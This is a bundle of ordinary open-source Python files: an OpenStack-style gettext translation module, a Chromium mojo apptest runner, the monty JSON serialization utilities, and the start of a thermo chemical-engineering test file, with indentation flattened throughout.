tf = TranslatorFactory(domain, lazy=True)
moves.builtins.__dict__['_'] = tf.primary
else:
localedir = '%s_LOCALEDIR' % domain.upper()
if six.PY3:
gettext.install(domain,
localedir=os.environ.get(localedir))
else:
gettext.install(domain,
localedir=os.environ.get(localedir),
unicode=True)
class Message(six.text_type):
"""A Message object is a unicode object that can be translated.
Translation of Message is done explicitly using the translate() method.
For all non-translation intents and purposes, a Message is simply unicode,
and can be treated as such.
"""
def __new__(cls, msgid, msgtext=None, params=None,
domain='oslo.utils', *args):
"""Create a new Message object.
In order for translation to work gettext requires a message ID, this
msgid will be used as the base unicode text. It is also possible
for the msgid and the base unicode text to be different by passing
the msgtext parameter.
"""
# If the base msgtext is not given, we use the default translation
# of the msgid (which is in English) just in case the system locale is
# not English, so that the base text will be in that locale by default.
if not msgtext:
msgtext = Message._translate_msgid(msgid, domain)
# We want to initialize the parent unicode with the actual object that
# would have been plain unicode if 'Message' was not enabled.
msg = super(Message, cls).__new__(cls, msgtext)
msg.msgid = msgid
msg.domain = domain
msg.params = params
return msg
def translate(self, desired_locale=None):
"""Translate this message to the desired locale.
:param desired_locale: The desired locale to translate the message to,
if no locale is provided the message will be
translated to the system's default locale.
:returns: the translated message in unicode
"""
translated_message = Message._translate_msgid(self.msgid,
self.domain,
desired_locale)
if self.params is None:
# No need for more translation
return translated_message
# This Message object may have been formatted with one or more
# Message objects as substitution arguments, given either as a single
# argument, part of a tuple, or as one or more values in a dictionary.
# When translating this Message we need to translate those Messages too
translated_params = _translate_args(self.params, desired_locale)
translated_message = translated_message % translated_params
return translated_message
@staticmethod
def _translate_msgid(msgid, domain, desired_locale=None):
if not desired_locale:
system_locale = locale.getdefaultlocale()
# If the system locale is not available to the runtime use English
if not system_locale[0]:
desired_locale = 'en_US'
else:
desired_locale = system_locale[0]
locale_dir = os.environ.get(domain.upper() + '_LOCALEDIR')
lang = gettext.translation(domain,
localedir=locale_dir,
languages=[desired_locale],
fallback=True)
if six.PY3:
translator = lang.gettext
else:
translator = lang.ugettext
translated_message = translator(msgid)
return translated_message
def __mod__(self, other):
# When we mod a Message we want the actual operation to be performed
# by the parent class (i.e. unicode()), the only thing we do here is
# save the original msgid and the parameters in case of a translation
params = self._sanitize_mod_params(other)
unicode_mod = super(Message, self).__mod__(params)
modded = Message(self.msgid,
msgtext=unicode_mod,
params=params,
domain=self.domain)
return modded
def _sanitize_mod_params(self, other):
"""Sanitize the object being modded with this Message.
- Add support for modding 'None' so translation supports it
- Trim the modded object, which can be a large dictionary, to only
those keys that would actually be used in a translation
- Snapshot the object being modded, in case the message is
translated, it will be used as it was when the Message was created
"""
if other is None:
params = (other,)
elif isinstance(other, dict):
# Merge the dictionaries
# Copy each item in case one does not support deep copy.
params = {}
if isinstance(self.params, dict):
for key, val in self.params.items():
params[key] = self._copy_param(val)
for key, val in other.items():
params[key] = self._copy_param(val)
else:
params = self._copy_param(other)
return params
def _copy_param(self, param):
try:
return copy.deepcopy(param)
except Exception:
# Fallback to casting to unicode this will handle the
# python code-like objects that can't be deep-copied
return six.text_type(param)
def __add__(self, other):
msg = _('Message objects do not support addition.')
raise TypeError(msg)
def __radd__(self, other):
return self.__add__(other)
if six.PY2:
def __str__(self):
# NOTE(luisg): Logging in python 2.6 tries to str() log records,
# and it expects specifically a UnicodeError in order to proceed.
msg = _('Message objects do not support str() because they may '
'contain non-ascii characters. '
'Please use unicode() or translate() instead.')
raise UnicodeError(msg)
def get_available_languages(domain):
"""Lists the available languages for the given translation domain.
:param domain: the domain to get languages for
"""
if domain in _AVAILABLE_LANGUAGES:
return copy.copy(_AVAILABLE_LANGUAGES[domain])
localedir = '%s_LOCALEDIR' % domain.upper()
find = lambda x: gettext.find(domain,
localedir=os.environ.get(localedir),
languages=[x])
# NOTE(mrodden): en_US should always be available (and first in case
# order matters) since our in-line message strings are en_US
language_list = ['en_US']
# NOTE(luisg): Babel <1.0 used a function called list(), which was
# renamed to locale_identifiers() in >=1.0, the requirements master list
# requires >=0.9.6, uncapped, so defensively work with both. We can remove
# this check when the master list updates to >=1.0, and update all projects
list_identifiers = (getattr(localedata, 'list', None) or
getattr(localedata, 'locale_identifiers'))
locale_identifiers = list_identifiers()
for i in locale_identifiers:
if find(i) is not None:
language_list.append(i)
# NOTE(luisg): Babel>=1.0,<1.3 has a bug where some OpenStack supported
# locales (e.g. 'zh_CN', and 'zh_TW') aren't supported even though they
# are perfectly legitimate locales:
# https://github.com/mitsuhiko/babel/issues/37
# In Babel 1.3 they fixed the bug and they support these locales, but
# they are still not explicitly "listed" by locale_identifiers().
# That is why we add the locales here explicitly if necessary so that
# they are listed as supported.
aliases = {'zh': 'zh_CN',
'zh_Hant_HK': 'zh_HK',
'zh_Hant': 'zh_TW',
'fil': 'tl_PH'}
for (locale, alias) in six.iteritems(aliases):
if locale in language_list and alias not in language_list:
language_list.append(alias)
_AVAILABLE_LANGUAGES[domain] = language_list
return copy.copy(language_list)
def translate(obj, desired_locale=None):
"""Gets the translated unicode representation of the given object.
If the object is not translatable it is returned as-is.
If the locale is None the object is translated to the system locale.
:param obj: the object to translate
:param desired_locale: the locale to translate the message to, if None the
default system locale will be used
:returns: the translated object in unicode, or the original object if
it could not be translated
"""
message = obj
if not isinstance(message, Message):
# If the object to translate is not already translatable,
# let's first get its unicode representation
message = six.text_type(obj)
if isinstance(message, Message):
# Even after unicoding() we still need to check if we are
# running with translatable unicode before translating
return message.translate(desired_locale)
return obj
def _translate_args(args, desired_locale=None):
"""Translates all the translatable elements of the given arguments object.
This method is used for translating the translatable values in method
arguments which include values of tuples or dictionaries.
If the object is not a tuple or a dictionary the object itself is
translated if it is translatable.
If the locale is None the object is translated to the system locale.
:param args: the args to translate
:param desired_locale: the locale to translate the args to, if None the
default system locale will be used
:returns: a new args object with the translated contents of the original
"""
if isinstance(args, tuple):
return tuple(translate(v, desired_locale) for v in args)
if isinstance(args, dict):
translated_dict = {}
for (k, v) in six.iteritems(args):
translated_v = translate(v, desired_locale)
translated_dict[k] = translated_v
return translated_dict
return translate(args, desired_locale)
class TranslationHandler(handlers.MemoryHandler):
"""Handler that translates records before logging them.
The TranslationHandler takes a locale and a target logging.Handler object
to forward LogRecord objects to after translating them. This handler
depends on Message objects being logged, instead of regular strings.
The handler can be configured declaratively in the logging.conf as follows:
[handlers]
keys = translatedlog, translator
[handler_translatedlog]
class = handlers.WatchedFileHandler
args = ('/var/log/api-localized.log',)
formatter = context
[handler_translator]
class = openstack.common.log.TranslationHandler
target = translatedlog
args = ('zh_CN',)
If the specified locale is not available in the system, the handler will
log in the default locale.
"""
def __init__(self, locale=None, target=None):
"""Initialize a TranslationHandler
:param locale: locale to use for translating messages
:param target: logging.Handler object to forward
LogRecord objects to after translation
"""
# NOTE(luisg): In order to allow this handler to be a wrapper for
# other handlers, such as a FileHandler, and still be able to
# configure it using logging.conf, this handler has to extend
# MemoryHandler because only the MemoryHandlers' logging.conf
# parsing is implemented such that it accepts a target handler.
handlers.MemoryHandler.__init__(self, capacity=0, target=target)
self.locale = locale
def setFormatter(self, fmt):
self.target.setFormatter(fmt)
def emit(self, record):
# We save the message from the original record to restore it
# after translation, so other handlers are not affected by this
original_msg = record.msg
original_args = record.args
try:
self._translate_and_log_record(record)
finally:
record.msg = original_msg
record.args = original_args
def _translate_and_log_record(self, record):
record.msg = translate(record.msg, self.locale)
# In addition to translating the message, we also need to translate
# arguments that were passed to the log method that were not part
# of the main message e.g., log.info(_('Some message %s'), this_one))
record.args = _translate_args(record.args, self.locale)
self.target.emit(record)
| |
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import logging
import os
import Queue
import re
import subprocess
import sys
import threading
import time
from mopy.config import Config
from mopy.paths import Paths
sys.path.append(os.path.join(os.path.abspath(os.path.dirname(__file__)),
'..', '..', '..', 'testing'))
import xvfb
# The DISPLAY ID number used for xvfb, incremented with each use.
XVFB_DISPLAY_ID = 9
def set_color():
'''Run gtests with color on TTY, unless its environment variable is set.'''
if sys.stdout.isatty() and 'GTEST_COLOR' not in os.environ:
logging.getLogger().debug('Setting GTEST_COLOR=yes')
os.environ['GTEST_COLOR'] = 'yes'
def run_apptest(config, shell, args, apptest, isolate):
'''Run the apptest; optionally isolating fixtures across shell invocations.
Returns the list of test fixtures run and the list of failed test fixtures.
TODO(msw): Also return the list of DISABLED test fixtures.
Args:
config: The mopy.config.Config for the build.
shell: The mopy.android.AndroidShell, if Android is the target platform.
args: The arguments for the shell or apptest.
apptest: The application test URL.
isolate: True if the test fixtures should be run in isolation.
'''
if not isolate:
return _run_apptest_with_retry(config, shell, args, apptest)
fixtures = _get_fixtures(config, shell, args, apptest)
fixtures = [f for f in fixtures if not f.startswith('DISABLED_')]
failed = []
for fixture in fixtures:
arguments = args + ['--gtest_filter=%s' % fixture]
failures = _run_apptest_with_retry(config, shell, arguments, apptest)[1]
failed.extend(failures if failures != [apptest] else [fixture])
# Abort when 20 fixtures, or a tenth of the apptest fixtures, have failed.
# base::TestLauncher does this for timeouts and unknown results.
if len(failed) >= max(20, len(fixtures) / 10):
print 'Too many failing fixtures (%d), exiting now.' % len(failed)
return (fixtures, failed + [apptest + ' aborted for excessive failures.'])
return (fixtures, failed)
# TODO(msw): Determine proper test retry counts; allow configuration.
def _run_apptest_with_retry(config, shell, args, apptest, retry_count=2):
'''Runs an apptest, retrying on failure; returns the fixtures and failures.'''
(tests, failed) = _run_apptest(config, shell, args, apptest)
while failed and retry_count:
print 'Retrying failed tests (%d attempts remaining)' % retry_count
arguments = args
# Retry only the failing fixtures if there is no existing filter specified.
if failed != [apptest] and not [a for a in args if '--gtest_filter=' in a]:
arguments += ['--gtest_filter=%s' % ':'.join(failed)]
failed = _run_apptest(config, shell, arguments, apptest)[1]
retry_count -= 1
return (tests, failed)
def _run_apptest(config, shell, args, apptest):
'''Runs an apptest; returns the list of fixtures and the list of failures.'''
command = _build_command_line(config, args, apptest)
logging.getLogger().debug('Command: %s' % ' '.join(command))
start_time = time.time()
try:
output = _run_test_with_xvfb(config, shell, args, apptest)
except Exception as e:
_print_exception(command, e)
return ([apptest], [apptest])
# Find all fixtures begun from gtest's '[ RUN ] <Suite.Fixture>' output.
tests = [x for x in output.split('\n') if x.find('[ RUN ] ') != -1]
tests = [x.strip(' \t\n\r')[x.find('[ RUN ] ') + 13:] for x in tests]
# Fail on output with gtest's '[ FAILED ]' or a lack of '[ OK ]'.
# The latter check ensures failure on broken command lines, hung output, etc.
# Check output instead of exit codes because mojo shell always exits with 0.
failed = [x for x in tests if (re.search('\[ FAILED \].*' + x, output) or
not re.search('\[ OK \].*' + x, output))]
ms = int(round(1000 * (time.time() - start_time)))
if failed:
_print_exception(command, output, ms)
else:
logging.getLogger().debug('Passed in %d ms with output:\n%s' % (ms, output))
return (tests, failed)
def _get_fixtures(config, shell, args, apptest):
'''Returns an apptest's 'Suite.Fixture' list via --gtest_list_tests output.'''
arguments = args + ['--gtest_list_tests']
command = _build_command_line(config, arguments, apptest)
logging.getLogger().debug('Command: %s' % ' '.join(command))
try:
tests = _run_test_with_xvfb(config, shell, arguments, apptest)
logging.getLogger().debug('Tests for %s:\n%s' % (apptest, tests))
# Remove log lines from the output and ensure it matches known formatting.
tests = re.sub('^(\[|WARNING: linker:).*\n', '', tests, flags=re.MULTILINE)
if not re.match('^(\w*\.\r?\n( \w*\r?\n)+)+', tests):
raise Exception('Unrecognized --gtest_list_tests output:\n%s' % tests)
test_list = []
for line in tests.split('\n'):
if not line:
continue
if line[0] != ' ':
suite = line.strip()
continue
test_list.append(suite + line.strip())
return test_list
except Exception as e:
_print_exception(command, e)
return []
def _print_exception(command_line, exception, milliseconds=None):
'''Print a formatted exception raised from a failed command execution.'''
details = (' (in %d ms)' % milliseconds) if milliseconds else ''
if hasattr(exception, 'returncode'):
details += ' (with exit code %d)' % exception.returncode
print '\n[ FAILED ] Command%s: %s' % (details, ' '.join(command_line))
print 72 * '-'
if hasattr(exception, 'output'):
print exception.output
print str(exception)
print 72 * '-'
def _build_command_line(config, args, apptest):
'''Build the apptest command line. This value isn't executed on Android.'''
not_list_tests = not '--gtest_list_tests' in args
data_dir = ['--use-temporary-user-data-dir'] if not_list_tests else []
return Paths(config).mojo_runner + data_dir + args + [apptest]
def _run_test_with_xvfb(config, shell, args, apptest):
'''Run the test with xvfb; return the output or raise an exception.'''
env = os.environ.copy()
if (config.target_os != Config.OS_LINUX or '--gtest_list_tests' in args
or not xvfb.should_start_xvfb(env)):
return _run_test_with_timeout(config, shell, args, apptest, env)
try:
# Simply prepending xvfb.py to the command line precludes direct control of
# test subprocesses, and prevents easily getting output when tests timeout.
xvfb_proc = None
openbox_proc = None
global XVFB_DISPLAY_ID
display_string = ':' + str(XVFB_DISPLAY_ID)
(xvfb_proc, openbox_proc) = xvfb.start_xvfb(env, Paths(config).build_dir,
display=display_string)
XVFB_DISPLAY_ID = (XVFB_DISPLAY_ID + 1) % 50000
if not xvfb_proc or not xvfb_proc.pid:
raise Exception('Xvfb failed to start; aborting test run.')
if not openbox_proc or not openbox_proc.pid:
raise Exception('Openbox failed to start; aborting test run.')
logging.getLogger().debug('Running Xvfb %s (pid %d) and Openbox (pid %d).' %
(display_string, xvfb_proc.pid, openbox_proc.pid))
return _run_test_with_timeout(config, shell, args, apptest, env)
finally:
xvfb.kill(xvfb_proc)
xvfb.kill(openbox_proc)
# TODO(msw): Determine proper test timeout durations (starting small).
def _run_test_with_timeout(config, shell, args, apptest, env, seconds=10):
'''Run the test with a timeout; return the output or raise an exception.'''
result = Queue.Queue()
thread = threading.Thread(target=_run_test,
args=(config, shell, args, apptest, env, result))
thread.start()
process_or_shell = result.get()
thread.join(seconds)
timeout_exception = ''
if thread.is_alive():
timeout_exception = '\nError: Test timeout after %s seconds' % seconds
logging.getLogger().debug('Killing the runner or shell for timeout.')
try:
process_or_shell.kill()
except OSError:
pass # The process may have ended after checking |is_alive|.
thread.join(seconds)
if thread.is_alive():
raise Exception('Error: Test hung and could not be killed!')
if result.empty():
raise Exception('Error: Test exited with no output.')
(output, exception) = result.get()
exception += timeout_exception
if exception:
raise Exception('%s%s%s' % (output, '\n' if output else '', exception))
return output
def _run_test(config, shell, args, apptest, env, result):
'''Run the test; put the shell/proc, output and any exception in |result|.'''
output = ''
exception = ''
try:
if config.target_os != Config.OS_ANDROID:
command = _build_command_line(config, args, apptest)
process = subprocess.Popen(command, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, env=env)
result.put(process)
(output, stderr_output) = process.communicate()
if process.returncode:
exception = 'Error: Test exited with code: %d\n%s' % (
process.returncode, stderr_output)
elif config.is_verbose:
output += '\n' + stderr_output
else:
assert shell
result.put(shell)
(r, w) = os.pipe()
with os.fdopen(r, 'r') as rf:
with os.fdopen(w, 'w') as wf:
arguments = args + [apptest]
shell.StartActivity('MojoShellActivity', arguments, wf, wf.close)
output = rf.read()
except Exception as e:
output += (e.output + '\n') if hasattr(e, 'output') else ''
exception += str(e)
result.put((output, exception))
| |
"""
JSON serialization and deserialization utilities.
"""
import datetime
import json
import os
import types
from collections import OrderedDict, defaultdict
from enum import Enum
from hashlib import sha1
from importlib import import_module
from inspect import getfullargspec
from uuid import UUID
try:
import numpy as np
except ImportError:
np = None # type: ignore
try:
import pandas as pd
except ImportError:
pd = None # type: ignore
try:
import pydantic
except ImportError:
pydantic = None # type: ignore
try:
import bson
except ImportError:
bson = None
try:
from ruamel.yaml import YAML
except ImportError:
YAML = None # type: ignore
__version__ = "3.0.0"
def _load_redirect(redirect_file):
try:
with open(redirect_file) as f:
yaml = YAML()
d = yaml.load(f)
except OSError:
# If we can't find the file
# Just use an empty redirect dict
return {}
# Convert the full paths to module/class
redirect_dict = defaultdict(dict)
for old_path, new_path in d.items():
old_class = old_path.split(".")[-1]
old_module = ".".join(old_path.split(".")[:-1])
new_class = new_path.split(".")[-1]
new_module = ".".join(new_path.split(".")[:-1])
redirect_dict[old_module][old_class] = {
"@module": new_module,
"@class": new_class,
}
return dict(redirect_dict)
class MSONable:
"""
This is a mix-in base class specifying an API for msonable objects. MSON
is Monty JSON. Essentially, MSONable objects must implement an as_dict
method, which must return a json serializable dict and must also support
no arguments (though optional arguments to finetune the output is ok),
and a from_dict class method that regenerates the object from the dict
generated by the as_dict method. The as_dict method should contain the
"@module" and "@class" keys which will allow the MontyEncoder to
dynamically deserialize the class. E.g.::
d["@module"] = self.__class__.__module__
d["@class"] = self.__class__.__name__
A default implementation is provided in MSONable, which automatically
determines if the class already contains self.argname or self._argname
attributes for every arg. If so, these will be used for serialization in
the dict format. Similarly, the default from_dict will deserialization
classes of such form. An example is given below::
class MSONClass(MSONable):
def __init__(self, a, b, c, d=1, **kwargs):
self.a = a
self.b = b
self._c = c
self._d = d
self.kwargs = kwargs
For such classes, you merely need to inherit from MSONable and you do not
need to implement your own as_dict or from_dict protocol.
New to Monty V2.0.6....
Classes can be redirected to moved implementations by putting in the old
fully qualified path and new fully qualified path into .monty.yaml in the
home folder
Example:
old_module.old_class: new_module.new_class
"""
REDIRECT = _load_redirect(os.path.join(os.path.expanduser("~"), ".monty.yaml"))
def as_dict(self) -> dict:
"""
A JSON serializable dict representation of an object.
"""
d = {"@module": self.__class__.__module__, "@class": self.__class__.__name__}
try:
parent_module = self.__class__.__module__.split(".", maxsplit=1)[0]
module_version = import_module(parent_module).__version__ # type: ignore
d["@version"] = str(module_version)
except (AttributeError, ImportError):
d["@version"] = None # type: ignore
spec = getfullargspec(self.__class__.__init__)
args = spec.args
def recursive_as_dict(obj):
if isinstance(obj, (list, tuple)):
return [recursive_as_dict(it) for it in obj]
if isinstance(obj, dict):
return {kk: recursive_as_dict(vv) for kk, vv in obj.items()}
if hasattr(obj, "as_dict"):
return obj.as_dict()
return obj
for c in args:
if c != "self":
try:
a = self.__getattribute__(c)
except AttributeError:
try:
a = self.__getattribute__("_" + c)
except AttributeError:
raise NotImplementedError(
"Unable to automatically determine as_dict "
"format from class. MSONAble requires all "
"args to be present as either self.argname or "
"self._argname, and kwargs to be present under"
"a self.kwargs variable to automatically "
"determine the dict format. Alternatively, "
"you can implement both as_dict and from_dict."
)
d[c] = recursive_as_dict(a)
if hasattr(self, "kwargs"):
# type: ignore
d.update(**getattr(self, "kwargs")) # pylint: disable=E1101
if spec.varargs is not None and getattr(self, spec.varargs, None) is not None:
d.update({spec.varargs: getattr(self, spec.varargs)})
if hasattr(self, "_kwargs"):
d.update(**getattr(self, "_kwargs")) # pylint: disable=E1101
if isinstance(self, Enum):
d.update({"value": self.value}) # pylint: disable=E1101
return d
@classmethod
def from_dict(cls, d):
"""
:param d: Dict representation.
:return: MSONable class.
"""
decoded = {k: MontyDecoder().process_decoded(v) for k, v in d.items() if not k.startswith("@")}
return cls(**decoded)
def to_json(self) -> str:
"""
Returns a json string representation of the MSONable object.
"""
return json.dumps(self, cls=MontyEncoder)
def unsafe_hash(self):
"""
Returns an hash of the current object. This uses a generic but low
performance method of converting the object to a dictionary, flattening
any nested keys, and then performing a hash on the resulting object
"""
def flatten(obj, seperator="."):
# Flattens a dictionary
flat_dict = {}
for key, value in obj.items():
if isinstance(value, dict):
flat_dict.update({seperator.join([key, _key]): _value for _key, _value in flatten(value).items()})
elif isinstance(value, list):
list_dict = {f"{key}{seperator}{num}": item for num, item in enumerate(value)}
flat_dict.update(flatten(list_dict))
else:
flat_dict[key] = value
return flat_dict
ordered_keys = sorted(flatten(jsanitize(self.as_dict())).items(), key=lambda x: x[0])
ordered_keys = [item for item in ordered_keys if "@" not in item[0]]
return sha1(json.dumps(OrderedDict(ordered_keys)).encode("utf-8"))
@classmethod
def __get_validators__(cls):
"""Return validators for use in pydantic"""
yield cls.validate_monty
@classmethod
def validate_monty(cls, v):
"""
pydantic Validator for MSONable pattern
"""
if isinstance(v, cls):
return v
if isinstance(v, dict):
new_obj = MontyDecoder().process_decoded(v)
if isinstance(new_obj, cls):
return new_obj
new_obj = cls(**v)
return new_obj
raise ValueError(f"Must provide {cls.__name__}, the as_dict form, or the proper")
@classmethod
def __modify_schema__(cls, field_schema):
"""JSON schema for MSONable pattern"""
field_schema.update(
{
"type": "object",
"properties": {
"@class": {"enum": [cls.__name__], "type": "string"},
"@module": {"enum": [cls.__module__], "type": "string"},
"@version": {"type": "string"},
},
"required": ["@class", "@module"],
}
)
class MontyEncoder(json.JSONEncoder):
"""
A Json Encoder which supports the MSONable API, plus adds support for
numpy arrays, datetime objects, bson ObjectIds (requires bson).
Usage::
# Add it as a *cls* keyword when using json.dump
json.dumps(object, cls=MontyEncoder)
"""
def default(self, o) -> dict: # pylint: disable=E0202
"""
Overriding default method for JSON encoding. This method does two
things: (a) If an object has a to_dict property, return the to_dict
output. (b) If the @module and @class keys are not in the to_dict,
add them to the output automatically. If the object has no to_dict
property, the default Python json encoder default method is called.
Args:
o: Python object.
Return:
Python dict representation.
"""
if isinstance(o, datetime.datetime):
return {"@module": "datetime", "@class": "datetime", "string": o.__str__()}
if isinstance(o, UUID):
return {"@module": "uuid", "@class": "UUID", "string": o.__str__()}
if np is not None:
if isinstance(o, np.ndarray):
if str(o.dtype).startswith("complex"):
return {
"@module": "numpy",
"@class": "array",
"dtype": o.dtype.__str__(),
"data": [o.real.tolist(), o.imag.tolist()],
}
return {
"@module": "numpy",
"@class": "array",
"dtype": o.dtype.__str__(),
"data": o.tolist(),
}
if isinstance(o, np.generic):
return o.item()
if pd is not None:
if isinstance(o, pd.DataFrame):
return {
"@module": "pandas",
"@class": "DataFrame",
"data": o.to_json(default_handler=MontyEncoder().encode),
}
if isinstance(o, pd.Series):
return {
"@module": "pandas",
"@class": "Series",
"data": o.to_json(default_handler=MontyEncoder().encode),
}
if bson is not None:
if isinstance(o, bson.objectid.ObjectId):
return {"@module": "bson.objectid", "@class": "ObjectId", "oid": str(o)}
if callable(o) and not isinstance(o, MSONable):
return _serialize_callable(o)
try:
if pydantic is not None and isinstance(o, pydantic.BaseModel):
d = o.dict()
else:
d = o.as_dict()
if "@module" not in d:
d["@module"] = str(o.__class__.__module__)
if "@class" not in d:
d["@class"] = str(o.__class__.__name__)
if "@version" not in d:
try:
parent_module = o.__class__.__module__.split(".")[0]
module_version = import_module(parent_module).__version__ # type: ignore
d["@version"] = str(module_version)
except (AttributeError, ImportError):
d["@version"] = None
return d
except AttributeError:
return json.JSONEncoder.default(self, o)
class MontyDecoder(json.JSONDecoder):
"""
A Json Decoder which supports the MSONable API. By default, the
decoder attempts to find a module and name associated with a dict. If
found, the decoder will generate a Pymatgen as a priority. If that fails,
the original decoded dictionary from the string is returned. Note that
nested lists and dicts containing pymatgen object will be decoded correctly
as well.
Usage:
# Add it as a *cls* keyword when using json.load
json.loads(json_string, cls=MontyDecoder)
"""
def process_decoded(self, d):
"""
Recursive method to support decoding dicts and lists containing
pymatgen objects.
"""
if isinstance(d, dict):
if "@module" in d and "@class" in d:
modname = d["@module"]
classname = d["@class"]
if classname in MSONable.REDIRECT.get(modname, {}):
modname = MSONable.REDIRECT[modname][classname]["@module"]
classname = MSONable.REDIRECT[modname][classname]["@class"]
elif "@module" in d and "@callable" in d:
modname = d["@module"]
objname = d["@callable"]
classname = None
if d.get("@bound", None) is not None:
# if the function is bound to an instance or class, first
# deserialize the bound object and then remove the object name
# from the function name.
obj = self.process_decoded(d["@bound"])
objname = objname.split(".")[1:]
else:
# if the function is not bound to an object, import the
# function from the module name
obj = __import__(modname, globals(), locals(), [objname], 0)
objname = objname.split(".")
try:
# the function could be nested. e.g., MyClass.NestedClass.function
# so iteratively access the nesting
for attr in objname:
obj = getattr(obj, attr)
return obj
except AttributeError:
pass
else:
modname = None
classname = None
if classname:
if modname and modname not in ["bson.objectid", "numpy", "pandas"]:
if modname == "datetime" and classname == "datetime":
try:
dt = datetime.datetime.strptime(d["string"], "%Y-%m-%d %H:%M:%S.%f")
except ValueError:
dt = datetime.datetime.strptime(d["string"], "%Y-%m-%d %H:%M:%S")
return dt
if modname == "uuid" and classname == "UUID":
return UUID(d["string"])
mod = __import__(modname, globals(), locals(), [classname], 0)
if hasattr(mod, classname):
cls_ = getattr(mod, classname)
data = {k: v for k, v in d.items() if not k.startswith("@")}
if hasattr(cls_, "from_dict"):
return cls_.from_dict(data)
if pydantic is not None and issubclass(cls_, pydantic.BaseModel):
return cls_(**data)
elif np is not None and modname == "numpy" and classname == "array":
if d["dtype"].startswith("complex"):
return np.array(
[np.array(r) + np.array(i) * 1j for r, i in zip(*d["data"])],
dtype=d["dtype"],
)
return np.array(d["data"], dtype=d["dtype"])
elif pd is not None and modname == "pandas":
if classname == "DataFrame":
decoded_data = MontyDecoder().decode(d["data"])
return pd.DataFrame(decoded_data)
if classname == "Series":
decoded_data = MontyDecoder().decode(d["data"])
return pd.Series(decoded_data)
elif (bson is not None) and modname == "bson.objectid" and classname == "ObjectId":
return bson.objectid.ObjectId(d["oid"])
return {self.process_decoded(k): self.process_decoded(v) for k, v in d.items()}
if isinstance(d, list):
return [self.process_decoded(x) for x in d]
return d
def decode(self, s):
"""
Overrides decode from JSONDecoder.
:param s: string
:return: Object.
"""
d = json.JSONDecoder.decode(self, s)
return self.process_decoded(d)
class MSONError(Exception):
"""
Exception class for serialization errors.
"""
def jsanitize(obj, strict=False, allow_bson=False, enum_values=False):
"""
This method cleans an input json-like object, either a list or a dict or
some sequence, nested or otherwise, by converting all non-string
dictionary keys (such as int and float) to strings, and also recursively
encodes all objects using Monty's as_dict() protocol.
Args:
obj: input json-like object.
strict (bool): This parameters sets the behavior when jsanitize
encounters an object it does not understand. If strict is True,
jsanitize will try to get the as_dict() attribute of the object. If
no such attribute is found, an attribute error will be thrown. If
strict is False, jsanitize will simply call str(object) to convert
the object to a string representation.
allow_bson (bool): This parameters sets the behavior when jsanitize
encounters an bson supported type such as objectid and datetime. If
True, such bson types will be ignored, allowing for proper
insertion into MongoDb databases.
enum_values (bool): Convert Enums to their values.
Returns:
Sanitized dict that can be json serialized.
"""
if isinstance(obj, Enum) and enum_values:
return obj.value
if allow_bson and (
isinstance(obj, (datetime.datetime, bytes)) or (bson is not None and isinstance(obj, bson.objectid.ObjectId))
):
return obj
if isinstance(obj, (list, tuple)):
return [jsanitize(i, strict=strict, allow_bson=allow_bson, enum_values=enum_values) for i in obj]
if np is not None and isinstance(obj, np.ndarray):
return [jsanitize(i, strict=strict, allow_bson=allow_bson, enum_values=enum_values) for i in obj.tolist()]
if np is not None and isinstance(obj, np.generic):
return obj.item()
if pd is not None and isinstance(obj, pd.DataFrame) or isinstance(obj, pd.Series):
return obj.to_dict()
if isinstance(obj, dict):
return {
k.__str__(): jsanitize(v, strict=strict, allow_bson=allow_bson, enum_values=enum_values)
for k, v in obj.items()
}
if isinstance(obj, (int, float)):
return obj
if obj is None:
return None
if callable(obj) and not isinstance(obj, MSONable):
try:
return _serialize_callable(obj)
except TypeError:
pass
if not strict:
return obj.__str__()
if isinstance(obj, str):
return obj.__str__()
if pydantic is not None and isinstance(obj, pydantic.BaseModel):
return jsanitize(MontyEncoder().default(obj), strict=strict, allow_bson=allow_bson, enum_values=enum_values)
return jsanitize(obj.as_dict(), strict=strict, allow_bson=allow_bson, enum_values=enum_values)
def _serialize_callable(o):
if isinstance(o, types.BuiltinFunctionType):
# don't care about what builtin functions (sum, open, etc) are bound to
bound = None
else:
# bound methods (i.e., instance methods) have a __self__ attribute
# that points to the class/module/instance
bound = getattr(o, "__self__", None)
# we are only able to serialize bound methods if the object the method is
# bound to is itself serializable
if bound is not None:
try:
bound = MontyEncoder().default(bound)
except TypeError:
raise TypeError("Only bound methods of classes or MSONable instances are supported.")
return {
"@module": o.__module__,
"@callable": getattr(o, "__qualname__", o.__name__),
"@bound": bound,
}
| |
# -*- coding: utf-8 -*-
'''Chemical Engineering Design Library (ChEDL). Utilities for process modeling.
Copyright (C) 2016, Caleb Bell <Caleb.Andrew.Bell@gmail.com>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.'''
from random import uniform
from numpy.testing import assert_allclose
import pytest
import pandas as pd
import numpy as np
from thermo.property_package import *
from thermo.eos import *
from thermo.eos_mix import *
from thermo.chemical import Chemical
from thermo.mixture import Mixture
from thermo.property_package_constants import PropertyPackageConstants, NRTL_PKG, PR_PKG, IDEAL_PKG
@pytest.mark.deprecated
def test_Ideal():
m = Mixture(['ethanol', 'water'], zs=[0.5, 0.5], P=5000, T=298.15)
vodka = Ideal(m.VaporPressures, m.Tms, m.Tcs, m.Pcs)
# Low pressure ethanol-water ideal TP flash
phase, xs, ys, V_over_F = vodka.flash_TP_zs(m.T, m.P, m.zs)
V_over_F_expect = 0.49376976949268025
xs_expect = [0.38951827297213176, 0.6104817270278682]
ys_expect = [0.6132697738819218, 0.3867302261180783]
assert phase == 'l/g'
assert_allclose(xs, xs_expect)
